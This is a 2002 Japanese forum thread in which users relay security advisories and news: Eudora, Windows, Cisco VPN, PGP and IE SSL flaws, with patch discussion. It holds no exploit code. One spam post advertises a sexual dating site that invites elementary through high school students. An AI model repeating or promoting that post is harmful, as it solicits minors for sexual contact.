(以上、2002年8月5日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20020805/11.html
353 :
名無しさん@お腹いっぱい。 :02/08/05 15:20 ID:rV4Dhp2y
354 :
むむむ ◆MUMUMU4w :02/08/05 16:44 ID:3Iq1phV9
■Eudora バージョン 5 for Windows に Buffer Overflow の問題
概要:
-----
QUALCOMM 社の Eudora バージョン 5 for Windows に Buffer Overflow の
問題を発見しました。悪意のある攻撃者に Eudora を実行するユーザの権限
で任意のコマンドを実行される可能性があります。
問題:
---
Eudora (開発元:米国QUALCOMM Inc., 日本語版開発製造元:株式会社クニ
リサーチインターナショナル)は Windows 95/98/2000/ME/NT 4.0 及び
MacOS 8.1 以上で動作する Mail User Agent です。
Eudora 5.x for Windows は、添付ファイルなど複数のパートで構成された
メールのパートの境界を示す boundary に、長い文字列を含むメールを読み
込んだ場合にバッファオーバーフローが発生します。我々の検証環境では任
意のコマンドを実行できることが確認できました。
問題を確認したバージョン:
-------------------------
Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) 日本語版
Eudora 5.1.1 for Windows (Sponsored Mode) 英語版
問題を確認したOS:
-----------------
Microsoft Windows 2000 Professional SP2 日本語版
Microsoft Windows 98 SE 日本語版
対策情報:
---------
Eudora の次期リリースで修正予定です。
次期リリースの出荷時期に関するベンダからの情報はありません。
発見と報告の経緯:
-----------------
(本文が長すぎる、と出たため略しました。発行元URLを参照ください)
発見者:
-------
三輪信雄 (LAC)
[email protected] 免責:
-----
このアドバイザリで示される情報は予告なしに変更されることがあり、かつ、
あるがままの形で提供されます。この情報を適用し生起される結果のリスク
は利用者が負うものとし、株式会社ラックは一切の責任を負わないものとし
ます。
再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/55.html
355 :
名無しさん@お腹いっぱい。 :02/08/05 17:01 ID:dEuuDHht
356 :
むむむ ◆MUMUMU4w :02/08/06 00:59 ID:IuqAcAwf
357 :
名無しさん@お腹いっぱい。 :02/08/06 10:39 ID:tm/mEb3y
>>357 正式発表じゃないし、正式発表は8月9日だから待ったら。
359 :
むむむ ◆MUMUMU4w :02/08/06 15:25 ID:3lc8X14c
360 :
のり :02/08/06 15:39 ID:???
マイクロソフト、ウィンドウズ情報開示へ 【ニューヨーク5日共同】米マイクロソフトは5日、 米独占禁止法(反トラスト法)違反訴訟で米司法省な どと昨年11月に合意した和解案の一部を実行し、パ ソコンの基本ソフト(OS)「ウィンドウズ」と応用 ソフトとの接続に関する約300の技術情報を今月中 にも無料で開示すると発表した。
361 :
むむむ ◆MUMUMU4w :02/08/06 18:08 ID:3lc8X14c
■脆弱性情報のデータベース化で専門家集団が結束
ソフトの脆弱性やセキュリティツール、バグ関連の議論など、セキュリティに関する
情報を集めたデータベースの構築を目指し、ハッカーとセキュリティ専門家が結束した。
この目標に向けて、独立した4つのプロジェクト――セキュリティ情報サイトの「Open
Source Vulnerability Database」、改ざん追跡サービスの「Alldas.de」、ソフトデータ
ベースの「PacketStorm」、および脆弱性監視サイトの「VulnWatch」――が緩やかな
コラボレーションとして組織化され、「Internetworked Security Information Service」
(ISIS)として活動することになる。
(以上、2002年8月6日のZDNet JAPANより一部引用―全文は引用元を参照)
引用元:
http://www.zdnet.co.jp/news/0208/06/ne00_isis.html VulnWatchやPacketStormには日頃からお世話になってるので、一応注目しておこう。
362 :
むむむ ◆MUMUMU4w :02/08/06 19:12 ID:3lc8X14c
363 :
むむむ ◆MUMUMU4w :02/08/08 11:08 ID:yqSxjiZZ
364 :
名無しさん@お腹いっぱい。 :02/08/08 13:38 ID:w3asRpnl
365 :
むむむ ◆MUMUMU4w :02/08/09 00:01 ID:uDWy1QVP
■Windows、Mac、Linuxに共通のセキュリティーホール
セキュリティー専門家たちが、通信ソフトウェアに発見されたセキュリティーホールに
ついて警告を発した。Windows、『Mac OS X』、UNIXをベースにしたオペレーティング・
システム(OS)に加えて、『Kerberos』(ケルベロス)認証システムを実行しているコンピュー
ターが乗っ取られる危険性がある。
(以上、2002年8月9日のCNET Japan Tech Newsより一部引用―全文は引用元を参照)
引用元:
http://japan.cnet.com/Enterprise/News/2002/Item/020808-1.html?me ちょっと前から話題になっているRPC/XDRのセキュリティホールが、Kerberosにも
影響ある模様。で、KerberosはWindowsにも採用されてるので、Windowsにも影響
ある模様、とのこと。
367 :
むむむ ◆MUMUMU4w :02/08/09 01:09 ID:uDWy1QVP
>>367 ローカルで試してみますた。本当にダダ見えです(((( ;゚Д゚)))ガクガクブルブル
369 :
名無しさん@お腹いっぱい。 :02/08/09 07:59 ID:PDF3/tGT
>>369 ダウンロードしてみたが,もう使ってみた人いる?
なんかMSのサイト上にある日本語版ドキュメントはリンク切れだらけで
不気味なんだが...
371 :
むむむ ◆MUMUMU4w :02/08/09 13:39 ID:1RD6PuWV
372 :
名無しさん@Emacs :02/08/09 13:47 ID:dEEmL2YD
>>370 正式リリース前からずっと使ってるけど、全く問題ナシ。
むしろ解決された障害のほうが多い。
373 :
むむむ ◆MUMUMU4w :02/08/09 14:13 ID:1RD6PuWV
374 :
むむむ ◆MUMUMU4w :02/08/09 14:27 ID:1RD6PuWV
375 :
名無しさん@お腹いっぱい。 :02/08/09 17:21 ID:ix6A7i7O
良すれだな。セキュ板よりも役立つぞ。
ココとwin板の直リン倶楽部は定期的に見ちゃう。
378 :
むむむ ◆MUMUMU4w :02/08/12 15:12 ID:JPV/sP3g
379 :
へろへろりん :02/08/12 15:39 ID:awKDTa+p
Windows2000のSP3をダウンロードしたら SP1、SP2、その他修正モジュールは不要?
380 :
むむむ ◆MUMUMU4w :02/08/12 15:43 ID:JPV/sP3g
>>379 別途適用が必要な修正プログラム
以下の修正プログラムは Windows 2000 Service Pack 3 に含まれていません。
影響を受ける可能性のあるお客様は、セキュリティ修正プログラムを確認し、適用して
ください。
MS01-022 (Q296441) - WebDAV Service Provider によりスクリプトがユーザーとして
リクエストを行う
MS02-008 (Q318202) - XMLHTTP コントロールにより、ローカル ファイルにアクセス
することができる
以上、下記URLより引用しました。
Windows 2000 SP3 日本語版
http://www.microsoft.com/japan/technet/security/news/W2kSP3.asp
age
383 :
むむむ ◆MUMUMU4w :02/08/13 13:08 ID:OYSIaDlE
米マイクロソフト製品などにセキュリティ上の欠陥、情報漏えいの可能性=専門家
[サンフランシスコ 12日 ロイター] 複数の専門家は、米マイクロソフトMSFT.O が
開発したブラウザー「インターネット・エクスプローラ」(IE)や別会社による汎用暗号化
ソフト「PGP」に、セキュリティ上の欠陥があると指摘している。同製品をネット上で使用
した場合、クレジットカードなどの個人情報が外部に漏れる可能性もある、という。
サンフランシスコに本拠を置きセキュリティの研究を行っているマイク・ベンハム氏は、
ネット上で品物などを購入する際、IEを使用すると提供した個人情報がネット上で傍受
されてしまう可能性があると指摘している。
(以上、2002年8月13日のREUTERS.CO.JPより一部引用―全文は引用元を参照)
引用元:
http://www.reuters.co.jp/news_article.jhtml?type=technologynews&StoryID=1320260 とりあえず。もう少し具体的な情報があれば別途ここにでも。
384 :
むむむ ◆MUMUMU4w :02/08/13 14:37 ID:OYSIaDlE
385 :
むむむ ◆MUMUMU4w :02/08/13 15:38 ID:wTEgSc2I
■CiscoのVPNクライアントに複数の脆弱性
Cisco Security Advisory: Cisco VPN Client Multiple Vulnerabilities
http://www.cisco.com/warp/public/707/vpnclient-multiple-vuln-pub.shtml より以下引用:
--引用開始
Affected Products
The VPN Client software program runs on the following platforms:
Microsoft Windows-based PC.
Red Hat Version 6.2 Linux (Intel), or compatible distribution, using kernel Version 2.2.12
or later. It does not support kernel Version 2.5.
Solaris UltraSPARC running a 32-bit kernel OS Version 2.6 or later.
Mac OS X Version 10.1.0 or later.
All VPN Client software programs, earlier than version 3.6 and earlier than version 3.5.4,
on all platforms are affected by this vulnerability. This includes the previous Cisco
Secure VPN Client and the the Cisco VPN 3000 Client software programs.
Cisco VPN 5000 Client software programs are not affected by this vulnerability.
No other Cisco product is currently known to be affected by this vulnerability.
--引用終了
386 :
名無しさん@お腹いっぱい。 :02/08/13 15:44 ID:cDF/Cs1q
387 :
名無しさん@お腹いっぱい。 :02/08/13 16:03 ID:cDF/Cs1q
388 :
名無しさん@お腹いっぱい。 :02/08/13 17:07 ID:Vd5/zlhk
むむむさんはマイクロソフトの人か?
389 :
むむむ ◆MUMUMU4w :02/08/13 20:38 ID:OYSIaDlE
■PGPに脆弱性、メールが盗み見られる危険
セキュリティ研究者たちが、広く使われている暗号化ツール『PGP』(Pretty Good Privacy)
に脆弱性を発見した。これにより、重要な Eメールの中身が読まれてしまう可能性がある
という。
PGP は、インターネットの暗号化ツールのデファクトスタンダードで、まず破られることは
ないというのが大方の意見だ。ところが、セキュリティ企業 Counterpane Internet Security
Inc. と Columbia University の研究者たちが、PGP で暗号化されたメールに、スクランブル
を解かずに手を加える方法を発見したと述べた。
(中略)
この脆弱性の発見により、『OpenPGP』標準のアップデートが行なわれ、12日にはリリース
されることになっている。
また今回、別の暗号ツール『GnuPG』にも同様の脆弱性が見つかったが、こちらの場合、
データが暗号化の前に圧縮されていれば攻撃はかなり防げるという。
今回の脆弱性は「重大」に分類されるものの、これを悪用するのは非常に難しく、研究者
たちは PGP ユーザーに対し、返信の際、受信したメールのテキスト本文をそのまま残さ
ないよう呼びかけている。
(以上、2002年8月13日のjapan.internet.comより一部引用―全文は引用元を参照)
引用元:
http://japan.internet.com/webtech/20020813/12.html Counterpane Internet Security Inc.のアナウンス:
http://www.counterpane.com/pgp-attack.pdf
390 :
名無しさん@お腹いっぱい。 :02/08/13 22:47 ID:h9JlSFwB
>むむむ ◆MUMUMU4w さまへ ニュー速+でスレ立て依頼した者です。 詳しい続報をありがとうございます。
>>388 勤務中にスレ立てたりここにレスしたりしてる某株式会社の不良社員です。
>>390 どもです。
392 :
むむむ ◆MUMUMU4w :02/08/14 02:08 ID:4ZMLoWZ9
さっき、CNN.comにこんな記事があるのを見つけました。
かなりいやんな感じ。今日はもう寝ますが、明日以降何か情報出るかも。
Microsoft investigates possible IE flaw
Security hole could allow access to private information
SEATTLE, Washington (AP) -- Microsoft is investigating claims that its popular
Internet Explorer software has a loophole that lets attackers pose as legitimate
Web site operators, potentially giving them access to computer users' names,
passwords and credit card numbers.
Although Microsoft said it's too soon to judge the severity of the problem -- and
even whether the flaw exists -- some programmers and consultants said it could
threaten the security of everything from online banking to e-commerce.
The problem is "fairly serious," said Elias Levy, a member of software security
company Symantec Corp.'s security response team. He said that the complexity
involved makes the probability of widespread attacks unlikely.
(以上、2002年8月14日のCNN.comより一部引用―全文は引用元を参照)
引用元:
http://www.cnn.com/2002/TECH/internet/08/13/microsoft.security.ap/index.html
393 :
むむむ ◆MUMUMU4w :02/08/14 14:43 ID:Dr5H5Dfy
394 :
むむむ ◆MUMUMU4w :02/08/14 20:09 ID:x71xzoxL
>>392-393 どうやら SSL の証明書の取り扱いに問題がある模様。
「IEのSSLに脆弱性」複数のセキュリティ専門家が報告
複数のセキュリティ専門家が、米マイクロソフトのブラウザ「Internet Explorer(IE)」にある
脆弱性を指摘している。SSL証明書の取り扱い方法に問題があり、信頼性のあるWebサイト
になりすまし、オンライン取引などを実行する当事者間の通信内容を読み取る
「man-in-the-middle」攻撃が可能という。
395 :
むむむ ◆MUMUMU4w :02/08/14 20:14 ID:x71xzoxL
最近XPのバグが出ないのは、SP1で忙しいからでしょうか?
みんな穴兄弟
>>392-395 の問題ってエンドユーザー側ではどうしようもないからなあ・・・
あ、でもこんな記述あるね。
> 一方、Netscape にはこのような脆弱性はないとも述べている。
ということはオンラインショッピングではわざわざネスケ立ち上げた
方がいいのか・・・う〜ん。
399 :
むむむ ◆MUMUMU4w :02/08/16 10:58 ID:n7szTnN2
400 :
むむむ ◆MUMUMU4w :02/08/16 10:59 ID:n7szTnN2
401 :
むむむ ◆MUMUMU4w :02/08/16 11:53 ID:n7szTnN2
>>392-395 の続報。どうやらIEではなくWindowsそのものの問題の模様。
--- 引用開始
----------------------------------------------------------------------
IEのSSL機能の脆弱性の原因はWindows
----------------------------------------------------------------------
最近複数のセキュリティ専門家が、米マイクロソフトのInternet Explorer
(IE)ブラウザのSSL機能に脆弱性があると報告したが、同社は8月14日(米国
時間)、脆弱性があるのはIEではなく、複数バージョンのWindowsであること
を明らかにした。同社は、Windows 98/Me/NT4/2000/XP用のパッチを準備して
いる。
「SSL機能の脆弱性はIEの問題とされているが、これはWindowsの問題だ。Windows
の暗号機能に脆弱性があるため、OSにパッチを当てなければならない。IEは、
あくまでOSの暗号サービスを利用する側だ」と、マイクロソフト・セキュリテ
ィ・レスポンス・センターのマネジャー、スコット・カルプ氏は語る。
(以上、2002年8月16日のcomputerworld.jpより一部引用―全文は引用元を参照)
引用元:
http://www.computerworld.jp/contents/free/200208/20020815ms.html
402 :
コギャルとHな出会い :02/08/16 11:58 ID:Zz0lgkdA
http://kado7.ug.to/net/ 朝までから騒ぎ!!
小中高生
コギャル〜熟女まで
メル友
i/j/PC/対応
女性の子もたくさん来てね
小中高生大歓迎です
全国デ−トスポット情報も有ります。
全国エステ&ネイル情報あります。
激安携帯情報あります。
404 :
名無しさん@お腹いっぱい。 :02/08/16 22:21 ID:h7Gu4NvO
接続マネージャの問題により、権限が昇格する (Q326886) (MS02-042)
登録日 : 2002/8/16
更新日 : 2002/8/16
脆弱性の影響 : 権限の昇格
最大深刻度 : 高
影響を受けるソフトウェア :
・ Microsoft Windows 2000
問題 :
技術的な説明 :
接続マネージャ (NCM: Network Connection Manager) はホスト システムにより
管理されるすべてのネットワーク接続に制御メカニズムを提供します。NCM の
機能の中に、ネットワーク接続が確立されている時、ハンドラ ルーチンを
呼び出すものがあります。
仕様上、このハンドラ ルーチンはユーザーのセキュリティ コンテキストで実行
される必要があります。しかし、ある問題により、非常に複雑なプロセスを
要しますが、特権を持たないユーザーが LocalSystem のセキュリティ
コンテキストでハンドラ ルーチンを実行できる可能性があります。攻撃者は
この問題を悪用し、自分が選択したコードをハンドラとして指定し、さらに、
そのコードを NCM から呼び出させるために、ネットワーク接続を確立する
可能性があります。コードはシステム権限で実行されます。
・ Microsoft Windows 2000:
- PC/AT 互換機用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=41413 ダウンロード先のリストから Japanese を選択してください。
- NEC PC-9800シリーズ用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=41414 ダウンロード先のリストから Japanese NEC を選択してください。
修正プログラムに関する追加情報
対象プラットフォーム :
この修正プログラムは Windows 2000 Service Pack 2 または Service Pack 3
を実行しているシステムにインストールすることができます。
この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 に含まれる
予定です。
再起動の必要性 : あり
405 :
名無しさん@お腹いっぱい。 :02/08/16 23:40 ID:Baz7OFlp
↑ 既出
ここまで読んで、インストール完了 by ひでと
407 :
むむむ ◆MUMUMU4w :02/08/21 00:36 ID:ATF2KRZj
408 :
むむむ ◆MUMUMU4w :02/08/21 16:38 ID:Vtwk+QIG
409 :
むむむ ◆MUMUMU4w :02/08/21 16:39 ID:Vtwk+QIG
410 :
むむむ ◆MUMUMU4w :02/08/21 20:24 ID:Wd82/2q4
411 :
むむむ ◆MUMUMU4w :02/08/21 20:29 ID:Wd82/2q4
■マイクロソフトのFTMにセキュリティーホール (CNET Japan Tech News)
米マイクロソフトは20日(米国時間)、製品テストや大口ライセンスプログラムなど、多数の
有料加入制プログラムのユーザーに警告を出した。ダウンロード時に利用するソフトウェア
に影響しうるセキュリティー不具合を発見したとしている。
マイクロソフトは、『File Transfer Manager』(FTM)を利用している顧客に、最新バージョン
へのアップデートを懸命に呼びかけている。新バージョンは、6月末ごろにリリースされた
『FTM 4.0.0.72』だ。対象となる顧客は、マイクロソフトのFTM用ウェブサイトから新バージョン
をダウンロードできる。
FTMは、マイクロソフトの一部のサービスで使用するソフトウェアを、自動的にダウンロード
する際に使うものだ。マイクロソフトでは、ベータ版テスター、大口ライセンスプログラムに
加入している企業、『マイクロソフト開発者ネットワーク』(MSDN)の会員などにFTMを配布
している。
(以上、2002年8月21日のCNET Japan Tech Newsより一部引用―全文は引用元を参照)
引用元:
http://japan.cnet.com/Enterprise/News/2002/Item/020821-2.html?me
412 :
むむむ ◆MUMUMU4w :02/08/21 20:30 ID:Wd82/2q4
■破壊力の強いトロイの木馬「Portacopo」の新種が発見
アイ・ディフェンス・ジャパンからの情報によると、破壊力の強いトロイの木馬「Portacopo」
の新種が発見された。この新種は、ファイルのサイズは原種と同じ475,648バイトだが、
Portacopos.exe、portocop.exeというようにファイル名が異なる。ファイルのアイコンは、
中央が紫で白い線の縦長の四角形である。ファイル名は、ポルトガル語で「カップホルダー」
を意味し、ユーザーにコンピューターのCDトレイを開く害のないジョークプログラムであると
思わせる。しかしながら、実際には破壊力の強いトロイの木馬プログラムである。
(以上、2002年8月21日のYahoo!ニュースより一部引用―全文は引用元を参照)
引用元:
http://headlines.yahoo.co.jp/hl?a=20020821-00000010-vgb-sci
413 :
名無しさん@お腹いっぱい。 :02/08/21 21:12 ID:xvR0z+FL
414 :
名無しさん@お腹いっぱい。 :02/08/21 21:21 ID:OT0s21jj
>>413 なるほど、広告かと思ったけど、
それがウィルスなどをばら撒く注意するべきサイトってことだな?
415 :
名無しさん@お腹いっぱい。 :02/08/21 21:34 ID:TPG6GIdh
んなわけない
416 :
名無しさん@お腹いっぱい。 :02/08/21 21:51 ID:OT0s21jj
宣伝業者祭りにいかなくちゃ(w
XPだけど、みんなマメにアップデートしてる? もう面倒くさくなってしまった。
このニュースレターの購読の停止や、マイクロソフトホームページの
プロファイルセンターで購読されているニュースレターの購読を
すべて停止したい方は、このニュースレターの最後にある説明をお読みください。
=====================================================
このニュースレターでは、セキュリティ情報をいち早くお知らせするために、
要約情報という形式でご案内いたします。
このセキュリティ情報の詳細につきましては、現在準備中です。
=====================================================
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-044ov.asp MS02-044 に関する情報
「MS02-044: Office Web Components に安全でない機能が含まれる (Q328130)」
に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーによりお客様のコンピュータ上で任意のプログラムを実行される可能性
があります。
対象となる製品
==============
・ Office Web Components 2000
・ Office Web Components 2002
Office Web Components は、 以下の製品に含まれています。
・ Microsoft BackOffice Server 2000
・ Microsoft BackOffice Server 2002
・ Microsoft BizTalk Server 2000
・ Microsoft BizTalk Server 2002
・ Microsoft Commerce Server 2000
・ Microsoft Commerce Server 2002
・ Microsoft Internet Acceleration and Security Server 2000
・ Microsoft Office 2000
・ Microsoft Office XP
・ Microsoft Project 2002
・ Microsoft Project Server 2002
・ Microsoft Small Business Server 2000
(続く)
421 :
むむむ ◆MUMUMU4w :02/08/22 16:22 ID:XnXSXlrz
ナローバンドなんでめんどくさい罠
>>422 同意。
OfficeXP SP1なんか60MBくらい無かった?
30MBが限度だな。Irvineつかって一週間くらいかけた門(w
電話もつなげねーし。
ADSLは遠すぎて多分無理だし。
ISDNくらいは入ったほうがいいかな・・・。
あれはいただけないな。
CD\1kだして買おうかな。
424 :
むむむ ◆MUMUMU4w :02/08/23 11:25 ID:vQ8nka0W
■WindowsNT4/2000/XPのネットワークにDoS攻撃を受ける脆弱性(MS02-045)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-045ov.asp MS02-045 に関する情報
「MS02-045: ネットワーク共有プロバイダの未チェックのバッファにより、
サービス拒否が起こる (Q326830)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、ネットワーク共有プロバイダに含まれる未チェックのバッファ
により、お客様のコンピュータが STOP エラーにより停止する可能性がある
問題です。最悪の場合、悪意のあるユーザーによりお客様のコンピュータが
提供している全てのサービスを妨害される可能性があります。
対象となる製品
==============
・ Microsoft Windows NT 4.0 Workstation
・ Microsoft Windows NT 4.0 Server
・ Microsoft Windows NT 4.0 Terminal Sever Edition
・ Microsoft Windows 2000 Professional
・ Microsoft Windows 2000 Server
・ Microsoft Windows 2000 Advanced Server
・ Microsoft Windows XP Professional
(続く)
425 :
むむむ ◆MUMUMU4w :02/08/23 11:25 ID:vQ8nka0W
426 :
むむむ ◆MUMUMU4w :02/08/23 11:28 ID:vQ8nka0W
427 :
むむむ ◆MUMUMU4w :02/08/23 11:29 ID:vQ8nka0W
>>427 >■Internet Explorerの6つのセキュリティホールを修正するパッチ (MS02-247)
MS02-247 => MS02-047 です。スマソ。
>>427 ちなみに、その6つ。
・Gopher問題
・ActiveXの脆弱性 (MS02-046)
・HTMLディレクティブが不適切なためローカルファイルを盗まれる
・[ファイルのダウンロード]でダウンロード元の場所の表示方法に問題があった
・MS02-005 で修正した(はずの)問題が十分修正されていなかった
・ローカルHTMLリソースのCSS脆弱性の修正
433 :
探してみリークだよ :02/08/23 15:10 ID:H8tJgGQb
今日はたくさんあるな むむむさん、ノ●カレードゾー
WINDOWSha moudamepo
436 :
名無しさん@お腹いっぱい。 :02/08/23 22:10 ID:4IylUdqF
WindowsXPの自動アップデートがうざい。 むかつく。
439 :
初心者 :02/08/24 05:30 ID:???
>>439 Windows Update をしてください。
442 :
441 :02/08/24 14:29 ID:???
IE5.01 SP2×→SP3○
インスト時にIEの設定を書き換える、とかあるのか? 当方WinMe,IE6.0。>441のキャッシュでエラーは出なかった
444 :
441 :02/08/26 12:03 ID:???
445 :
むむむ ◆MUMUMU4w :02/08/29 11:58 ID:HXBwLqkx
■Windowsにデジタル証明書の利用を妨害される脆弱性(MS02-048)
IEをはじめとするWindows全体に影響あり
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-048ov.asp MS02-048 に関する情報
「MS02-048: Certificate Enrollment Control の問題により、
デジタル証明書が削除される (Q323172)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、Certificate Enrollment Control の問題により、
ローカルコンピュータに保存されている証明書が削除される可能性がある
問題です。最悪の場合、悪意のあるユーザーによりお客様のコンピュータで
証明書を利用するサービスが妨害される可能性があります。
対象となる製品
==============
・Microsoft Windows 98
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
(続く)
446 :
むむむ ◆MUMUMU4w :02/08/29 11:59 ID:HXBwLqkx
447 :
:02/08/29 12:15 ID:???
== 接続 - whois.nic.ad.jp ==
[ JPNIC & JPRS database provides information on network administration. Its ]
[ use is restricted to network administration purposes. For further infor- ]
[ mation, use 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, ]
[ add'/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]
Domain Information: [ドメイン情報]
a. [ドメイン名] EIKO-DO.CO.JP
e. [そしきめい] かぶしきがいしゃたなかえいこうどう
f. [組織名] 株式会社田中栄光堂
g. [Organization] TANAKA EIKO-DO CO.,LTD.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] IS442JP
n. [技術連絡担当者] IS442JP
p. [ネームサーバ] ns1.odn.ne.jp
p. [ネームサーバ] ns3.odn.ne.jp
y. [通知アドレス]
[email protected] [状態] Connected (2003/04/30)
[登録年月日] 2000/04/12
[接続年月日] 2000/04/14
[最終更新] 2002/05/01 02:35:05 (JST)
[email protected] == 終了 ==
448 :
髭 :02/08/29 14:51 ID:3lB5rjnX
なんかさ、LAN内部で誰がどのファイルをダウンロードしたかまで 追跡できるセキュリティーソフトの記事を最近みた記憶があるんだが、 検索しても出てこないわ、記憶も曖昧だわ、みつからんのじゃ。 履歴もたどってみたが、ないんじゃよ 誰か覚えてるかた、HPアドレスでもいいし、製品へのリンクでも良いし教えてくれないかのぅ?
449 :
むむむ ◆MUMUMU4w :02/08/29 16:29 ID:HXBwLqkx
451 :
名無しさん@お腹いっぱい。 :02/08/30 01:01 ID:ENwXQSWz
>>451 MS 的には IE の FIX ではなく、Windows システムの FIX だからでしょう。
453 :
むむむ ◆MUMUMU4w :02/08/30 12:21 ID:J+5a0ySC
454 :
名無しさん@お腹いっぱい。 :02/08/30 12:45 ID:aFN1YfZC
M$のウェブページってどうして分かりにくく作られてるんだろうね。 サイアクダ
最新のwindows updateしたらホットゾヌが不正な処理で起動しなくなりますた もうだめぽ
>451 Win Me,98,98SEならばqfecheck.exeでQ323172が表示されるぞ
>>456 qfecheck.exeで調べてみて、よく分からなかったんですが
どこで入手すればいいんでしょうか?
>457 スタート→ファイル名を指定して実行
459 :
457 :02/08/31 22:10 ID:???
>>458 ありがとうございます。
使用OSは98SEなんですが、W98欄に追加されていました。
多分大丈夫ですよね。
460 :
名無しさん@お腹いっぱい。 :02/08/31 23:29 ID:qOJShSqn
461 :
名無しさん@お腹いっぱい。 :02/09/01 08:00 ID:mODKjUO0
>>460 XPだけかもしれないけど、、、プログラムの追加と削除。
462 :
b :02/09/01 08:10 ID:TKLzbPh+
464 :
z :02/09/01 13:52 ID:lRGqyPeU
IBMのコンピューターとメビウス どっちがお勧め??
465 :
名無しさん@お腹いっぱい。 :02/09/01 14:38 ID:UganNaLO
>>461 おおお!
ちゃんと出てたよ!サンクスコ
466 :
451 :02/09/01 19:18 ID:???
467 :
名無しさん@お腹いっぱい。 :02/09/01 20:42 ID:UrdMlCEE
>>444 む。確かに長いURLを含むページは保存できない。
しかもアンインストールは当然のごとくできない・・・。
W2Kユーザでこの件に関しての情報、オイラも待ちます。
〜MS02-047(Q323759)の修正パッチ導入後、長いURLを
含むページがローカルに保存できない〜
468 :
☆☆解読 リーク☆☆ :02/09/01 21:03 ID:paIOqukh
470 :
469 :02/09/03 11:41 ID:???
472 :
469 :02/09/03 17:03 ID:???
>471 失礼!日本語版KBが公開されただけだった(^^;
age
474 :
むむむ ◆MUMUMU4w :02/09/05 09:14 ID:mB1VsAwF
475 :
むむむ ◆MUMUMU4w :02/09/05 11:49 ID:mB1VsAwF
476 :
219.96.219.219 :02/09/05 13:14 ID:RW6zRwDr
./'"" : .:.. .::: . :. .::"=, /:. :..:..:::::::::::::::;;;:::;;;:::;:..:.:!, i:.:::::;;;;;:::::-,:-'" ;:::::::i, ノ:::" ヽ,.. ;:::::::i, ,i::::. ,....,,,_ ,;;;;;;::::,,,,,.;:::;i.., ヽ;::,;:- ;:;;::,ー:;"/ / i"`:;":l, ;"!,:!, "''''"ノ: .ヽ---'" :l,,,/ !, ;!,"""~::.,....::,: .:l' 人生ってせつねーな 'l; ,//l,l,l,l,ll:: .;l ヽ, "~---'" ,;/!ヽ, ヽ,, /;;;" ヽ,,,,,,, ,,,,,,::---''''''''''''"!,i,"''''''''''"/ /::" "'--::;;, /";, :::ヽ, l,!,/=l;"~,/ /: :;--''"'ヽ, (;;;;,,ヾ, ;::: . l/,,,.l,/ ,/;' ' :',,..:' :ヽ ,ノ ::;;,,,::i, :, ::, i,./ / .: ,:'' _,,.,-'l;:.. ,i ,):::::.... "";, :,,:; / ,/.;;;;;, _,,;:-''''".,,;,:-"::... l
477 :
髭 :02/09/05 14:08 ID:9oQLi/1C
>>448 おい、おめぇら、なんで誰も教えてくれやがらねぇんだYO!!
外部からの浸食されるのばかりに気を遣ってる香具師は逝って良し!!
内部からっつーか背中に気を付けろ!!
って2ch語の質問じゃないと教えてくれないのかYO!!
と、言ってみるテスト
そうすると煽りばかりのレスしか付かない罠
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-050.asp 登録日 : 2002/9/5
更新日 : 2002/9/5
概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Windows、Office for Mac、Internet Explorer for Mac または Outlook Express for Mac を使用しているお客様
脆弱性の影響 : ID の偽装
最大深刻度 : 高
推奨する対応策 : 管理者は修正プログラムを直ちにインストールして下さい。
影響を受けるソフトウェア :
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Microsoft Windows NTR 4.0
Microsoft Windows NT 4.0, Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Office v.X for Mac
Microsoft Office 2001 for Mac
Microsoft Office 98 for Macintosh Edition
Microsoft Internet Explorer for Mac
Microsoft Outlook Express for Mac
>>480 の
証明書確認の問題により、
ID が偽装される (Q328145) (MS02-050)について捕捉
============================================================
以下の製品に関する修正プログラムは現在準備中です。
公開され次第、このページでご案内します。
Microsoft Windows 98
Windows 98 Second Edition
Windows Me
Windows 2000
Windows XP 64 bit Edition
Microsoft Office v.X for Mac
Microsoft Office 2001 for Mac
Microsoft Office 98 for Macintosh Edition
Microsoft Internet Explorer for Mac (for OS 8.1 to 9.x)
Microsoft Internet Explorer for Mac (for OS X)
Microsoft Outlook Express for Mac
============================================================
482 :
むむむ ◆MUMUMU4w :02/09/06 00:08 ID:phlEuKkC
>>480 どもです。今出張先から戻りました。詳細を貼っておきます。
■Windows98/Me/NT4/2000/XPに証明書のIDが偽装される「危険度高」の
セキュリティホール(MS02-050)
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050ov.asp MS02-050 に関する情報
「MS02-050: 証明書確認の問題により、ID が偽装される (Q328145)」に関する
要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、証明書の基本制約拡張が適切に確認されないために、 CA
(Certificate Authority: 証明機関)証明書として使用できない証明書で
